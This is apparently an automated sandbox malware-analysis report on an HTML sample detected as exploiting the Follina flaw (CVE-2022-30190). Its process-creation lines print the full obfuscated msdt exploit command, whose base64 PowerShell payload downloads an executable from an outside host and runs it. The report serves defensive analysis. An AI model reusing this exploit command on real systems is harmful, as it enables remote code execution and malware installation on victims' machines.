Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name: fbGUvJ4AdV.html
Analysis ID: 696621
MD5: da3469806af3aacbbbd22a763343fff2
SHA1: 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256: c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags: CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: 00000015.00000002.699305055.0000026F95E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.698287562.0000026F95B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.698319682.0000026F95B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: C:\Windows\System32\msdt.exe File created: C:\Users\user~1\AppData\Local\Temp\msdtadmin Jump to behavior
Source: C:\Windows\System32\msdt.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: mal48.expl.winHTML@41/0@4/7
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1828,i,12602353745346656133,16460015602543345588,131072 /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1828,i,12602353745346656133,16460015602543345588,131072 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\GoogleUpdater Jump to behavior
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe File opened: C:\Windows\system32\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 2624 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22 Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 696621 Sample: fbGUvJ4AdV.html Startdate: 02/09/2022 Architecture: WINDOWS Score: 48 28 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->28 6 chrome.exe 19 13 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.1 unknown unknown 6->16 18 192.168.2.23 unknown unknown 6->18 20 239.255.255.250 unknown Reserved 6->20 11 chrome.exe 6->11         started        14 msdt.exe 8 6->14         started        process5 dnsIp6 22 www.google.com 172.217.168.36, 443, 49741, 49800 GOOGLEUS United States 11->22 24 clients.l.google.com 172.217.168.78, 443, 49743, 49745 GOOGLEUS United States 11->24 26 3 other IPs or domains 11->26
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.58.215.237
 accounts.google.com United States
15169 GOOGLEUS false
172.217.168.78
 clients.l.google.com United States
15169 GOOGLEUS false
172.217.168.36
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.1
192.168.2.23
127.0.0.1

Contacted Domains

Name IP Active
accounts.google.com 216.58.215.237 true
www.google.com 172.217.168.36 true
clients.l.google.com 172.217.168.78 true
clients2.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
    		high
    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
      		high